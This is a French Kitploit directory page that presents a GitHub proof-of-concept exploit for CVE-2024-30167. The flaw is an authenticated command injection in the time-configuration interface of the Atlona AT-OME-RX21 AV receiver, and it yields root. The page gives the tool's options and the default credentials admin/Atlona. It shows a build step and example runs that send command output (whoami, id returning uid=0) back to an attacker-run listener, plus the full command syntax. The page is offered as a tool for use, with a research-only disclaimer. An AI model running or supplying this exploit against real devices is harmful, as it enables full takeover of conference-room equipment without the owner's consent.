Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-30167 — Exploit de preuve de concept pour l'injection de commande authentifiée dans Atlona AT-OME-RX21, permettant l'exécution de commandes au niveau root via l'interface de configuration de l'heure. | Kitploit
Outils/GitHubGitHub/rizzziom/cve-2024-30167
Sécurité des Systèmes EmbarquésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubrizzziom/cve-2024-30167

CVE-2024-30167

Exploit de preuve de concept pour l'injection de commande authentifiée dans Atlona AT-OME-RX21, permettant l'exécution de commandes au niveau root via l'interface de configuration de l'heure.

Voir le dépôt
12il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC pour Atlona OME - Injection de commande authentifiée

Avertissement : Cette preuve de concept est fournie uniquement à des fins éducatives et de recherche. N'utilisez pas ce code sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester. Je ne suis pas responsable de toute utilisation abusive.

Une vulnérabilité d'injection de commande authentifiée existe dans l'interface de configuration de l'heure du commutateur AV Atlona AT-OME-RX21. Un utilisateur disposant d'identifiants valides peut injecter des commandes système qui s'exécutent en tant que root, conduisant à un compromis total du système.

Informations sur le produit

Le Atlona AT-OME-RX21 est un récepteur et scaler AV (audio/vidéo) conçu pour les environnements professionnels de vidéoconférence et de collaboration. Il est principalement utilisé dans les salles de conférence, les salles de classe et les espaces de réunion informels. Il aide à connecter des périphériques comme les ordinateurs portables/systèmes de conférence aux écrans.

Cette PoC fonctionne sur toutes les versions de firmware <= 1.5.1

informations du vendeur : https://atlona.com/product/at-ome-rx21/

Utilisation

root@kitploit:~
$ .\cve-2024-30167.exe -h


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Usage of cve-2024-30167.exe:
  -P string
        listening port for command output (default "4444")
  -c string
        Command to execute on the target
  -l string
        listening host for command output
  -p string
        Password for authentication (default "Atlona")
  -t string
        Target URL (e.g: http://example.com)
  -u string
        Username for authentication (default "admin")
  1. Créez un binaire pour votre système
root@kitploit:~
go build -o <OUTPUT_FILENAME>
  1. Exécutez l'exploit contre le périphérique Atlona cible
root@kitploit:~
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
root

$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337    


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)

la commande ci-dessus utilise les identifiants par défaut pour se connecter au périphérique.

SYNTAXE :

root@kitploit:~
.\cve=2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>

Télécharger l’outil